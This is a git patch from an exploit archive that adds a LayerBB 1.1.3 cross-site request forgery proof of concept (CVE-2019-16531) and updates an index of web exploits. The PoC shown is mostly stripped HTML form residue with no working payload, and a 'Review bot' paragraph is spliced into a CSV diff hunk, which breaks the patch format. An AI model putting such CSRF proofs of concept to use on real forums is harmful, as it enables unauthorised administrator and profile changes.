From 7ceaed0205318cc551d06e9044f96e5a6ae0925d Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 21 Sep 2019 05:04:22 +0000
Subject: [PATCH] DB: 2019-09-21
1 changes to exploits/shellcodes
Concrete5 FlashUploader - Arbitrary '.SWF' File Upload
Concrete5 CMS FlashUploader - Arbitrary '.SWF' File Upload
Concrete5 < 8.3.0 - Username / Comments Enumeration
Concrete5 CMS < 8.3.0 - Username / Comments Enumeration
LayerBB < 1.1.4 - Cross-Site Request Forgery
---
 exploits/php/webapps/47403.html | 532 ++++++++++++++++++++++++++++++++
 files_exploits.csv | 5 +-
 2 files changed, 535 insertions(+), 2 deletions(-)
 create mode 100644 exploits/php/webapps/47403.html
diff --git a/exploits/php/webapps/47403.html b/exploits/php/webapps/47403.html
new file mode 100644
index 000000000..53d7e3eaf
--- /dev/null
+++ b/exploits/php/webapps/47403.html
@@ -0,0 +1,532 @@
+# Exploit Title: LayerBB 1.1.3 - Multiple CSRF
+# Date: 4/7/2019
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=30
+# Version: 1.1.3
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2019-16531
+
+
+1. Description:
+LayerBB is a free open-source forum software, multiple CSRF vulnerabilities were found such as editing user profiles and forums.
+
+
+2. Proof of Concepts:
+
+
+
+ + + + + + + + +
+ view_forum
create_thread
reply_thread
access_moderation
access_administration
+
+ This Usergroup is staff. +
+ +
+ + + +
+ + + + + + + + +
+ Do Not Change
+ Active
+ Disabled
+
+
+

+ +
+ + + +
+ + + + +
+
+ Guest
User
Banned
Moderator
Administrator
+
+ +
+ + + +
+ + + + +
+ +
+
+ +
+
+ Guest
User
Banned
Moderator
Administrator
+ Each Line is a new label. HTML enabled. +
+ +
+ + + +
+
+
+
+
+ + + + + + +
+
+
+
+
+
+
+
+
+

+ + HTML tags will be converted into ascii codes. Hyperlinks are not supported! + +
+ + HTML tags will be converted into ascii codes. + +
+ + + + + Use reCaptcha
+
+ + + +
+ + + +

+

+
+
+
+ + + + + + + + + + + + + + + + + + + + + + +
CategoryOrderControls
+ test cat
+ test cat +
+
+ + + +
+
+ +
+ First Category
+ First category on this forum! +
+
+ + + +
+
+ +
+

Use ENTER to save catagory order

+ + + + + + + + + + + + + + + + + + +
NodeOrderControls
+ First Node
+ The first node on this forum
+ Sub-Forums: +
+
+ + + +
+
+ +
+

Use ENTER to save catagory order

+ + + +
+ + + +
+ + +
+ + + +
+ + +
+ + +
+
+ + +
+
+ + +
+
+ + +
+ +
+ + + +
+ + + + +
+ +
+ User
Banned
Moderator
Administrator
+
+ +
+ + + +
+ + + + +
+ +
+
+ +
+ +
+ User
Banned
Moderator
Administrator
+ Each Line is a new label. HTML enabled. +
+ +
+ + + +
+ + + + +
+ view_forum
create_thread
reply_thread
access_moderation
access_administration
+
+ This Usergroup is staff. +
+ +
+ + + +
+ +
+ + +
+ +
+ + + +
+ +
+ + +
+
+ + +
+
+ + +
+
+ + +
+
+ + +
+ +
+ + + +
+
+ +
+ +
+ + + +
+ +
+
+ + +
+ +
+ +
+ +
+
+
+ + + + + + + Add an answer field +
+
+
+
+ + + +
+ +

+ +

+
+ + + +
+ +

+ +

+
+ + + +
+ + +
+ +
+ + + +
+ + + + + + + + +
+ + +
+ + + In the format of: YYYY-MM-DD +
+ +
+
+
Additional Profile Fields
+
+
+
+ +
+ + + +
+ + +

+ +
+ + + +
+ + + + +

+ +
+ + + +
+ + +

+ +
+ + + +
+ + + + +

+ +
+ + + +
+ + + + + + + + +
+ LayerBB Captcha
+

+ + By clicking "Register", you agree to abide by the forum rules located here. +
+
+
+
+
+3. Solution:
+Update to 1.1.4
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 614976ce9..b16c4881d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -37150,7 +37150,7 @@ id,file,description,date,author,type,platform,port
 37223,exploits/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp?path' Traversal Arbitrary File Access",2012-05-21,"Aung Khant",webapps,asp,
 37224,exploits/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Cross-Site Scripting",2012-05-21,MustLive,webapps,php,
 37225,exploits/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Vulnerabilities",2012-05-20,AkaStep,webapps,php,
-37226,exploits/php/webapps/37226.txt,"Concrete5 FlashUploader - Arbitrary '.SWF' File Upload",2012-05-20,AkaStep,webapps,php,
+37226,exploits/php/webapps/37226.txt,"Concrete5 CMS FlashUploader - Arbitrary '.SWF' File Upload",2012-05-20,AkaStep,webapps,php,
 37350,exploits/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'index.php?id' SQL Injection",2012-06-03,KedAns-Dz,webapps,php,
 37351,exploits/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'admin.php' Multiple SQL Injections",2012-06-03,KedAns-Dz,webapps,php,
 37352,exploits/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,webapps,php,
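Review bot: In exploits/php/webapps/47403.html the header and "1. Description" do not say which requests are affected or what they have in common: only "editing user profiles and forums" is named, while the surviving form labels (usergroup permissions such as `access_administration`, "This Usergroup is staff.", the registration form) suggest most of the forms cover administrator actions. A short list of the affected actions under the description, and a statement in "3. Solution" of what 1.1.4 changes (presumably per-request anti-CSRF tokens, which this page does not confirm), would let operators judge exposure and verify the fix, for example `Update to 1.1.4; confirm state-changing forms carry a per-session token`. `# Date: 4/7/2019` is ambiguous between day-first and month-first and differs from the 2019-09-20 recorded in files_exploits.csv, so an ISO `YYYY-MM-DD` date would be clearer. The file title ("LayerBB 1.1.3 - Multiple CSRF") and the index title ("LayerBB < 1.1.4 - Cross-Site Request Forgery") also describe the affected range differently, and the file ends without a trailing newline.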
@@ -40324,7 +40324,7 @@ id,file,description,date,author,type,platform,port
 44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,
 44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
 44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
-44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
+44194,exploits/php/webapps/44194.py,"Concrete5 CMS < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
 44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,
 44219,exploits/hardware/webapps/44219.txt,"D-Link DIR-600M Wireless - Cross-Site Scripting",2018-03-02,"Prasenjit Kanti Paul",webapps,hardware,
 44220,exploits/multiple/webapps/44220.txt,"antMan < 0.9.1a - Authentication Bypass",2018-03-02,"Joshua Bowser",webapps,multiple,
@@ -41745,3 +41745,4 @@ id,file,description,date,author,type,platform,port
 47399,exploits/hardware/webapps/47399.txt,"Western Digital My Book World II NAS 1.02.12 - Authentication Bypass / Command Execution",2019-09-19,"Noman Riffat",webapps,hardware,
 47401,exploits/php/webapps/47401.txt,"DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection",2019-09-19,n1x_,webapps,php,
 47402,exploits/php/webapps/47402.txt,"GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting",2019-09-19,cakes,webapps,php,
+47403,exploits/php/webapps/47403.html,"LayerBB < 1.1.4 - Cross-Site Request Forgery",2019-09-20,0xB9,webapps,php,